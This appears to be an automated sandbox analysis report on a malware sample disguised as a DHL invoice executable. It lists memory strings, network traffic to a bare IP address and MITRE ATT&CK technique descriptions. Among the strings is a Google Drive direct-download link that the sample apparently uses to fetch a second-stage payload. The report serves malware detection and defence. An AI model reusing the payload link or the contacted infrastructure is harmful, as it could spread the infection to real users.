Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11435219266.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11434514071.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/rootJA(
Source: DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.0000000000649000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: DHL_#U53d1#U7968.exe, B73EF6.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: DHL_#U53d1#U7968.exe, B73EF6.exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: DHL_#U53d1#U7968.exe, B73EF6.exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: DHL_#U53d1#U7968.exe, B73EF6.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: DHL_#U53d1#U7968.exe, B73EF6.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: DHL_#U53d1#U7968.exe, B73EF6.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.0000000000649000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.0000000000626000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11435219266.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11434514071.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.00000000005F2000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.00000000005F2000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002989000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: DHL_#U53d1#U7968.exe, B73EF6.exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: DHL_#U53d1#U7968.exe, B73EF6.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: DHL_#U53d1#U7968.exe, B73EF6.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11435219266.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11434514071.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002989000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0s-3o-docs.googleusercontent.com/
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0s-3o-docs.googleusercontent.com/%%doc-0s-3o-docs.googleusercontent.com
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11469874763.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0s-3o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ca95q9sr
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002976000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11509498656.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RkYk72jHuXza_mEHkFaPldPXcTgoFYZE
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RkYk72jHuXza_mEHkFaPldPXcTgoFYZEv
Source: DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.0000000000649000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11436067164.000000003297A000.00000004.00001000.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11436067164.0000000032970000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11436067164.000000003297A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11436067164.000000003297A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11436067164.000000003297A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11435219266.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11434514071.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Aug 2023 17:13:02 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://216-128-145-196.cprapid.com/~wellseconds/wp-json/>; rel="https://api.w.org/"Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 65 6c 6c 20 53 65 63 6f 6e 64 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 5c 2f 7e 77 65 6c 6c 73 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Aug 2023 17:13:03 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://216-128-145-196.cprapid.com/~wellseconds/wp-json/>; rel="https://api.w.org/"Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 65 6c 6c 20 53 65 63 6f 6e 64 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 5c 2f 7e 77 65 6c 6c 73 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Aug 2023 17:13:05 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://216-128-145-196.cprapid.com/~wellseconds/wp-json/>; rel="https://api.w.org/"Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 65 6c 6c 20 53 65 63 6f 6e 64 73 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <!doctype html><html lang="en-US" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page not found – Well Seconds</title>

Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.145.196
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
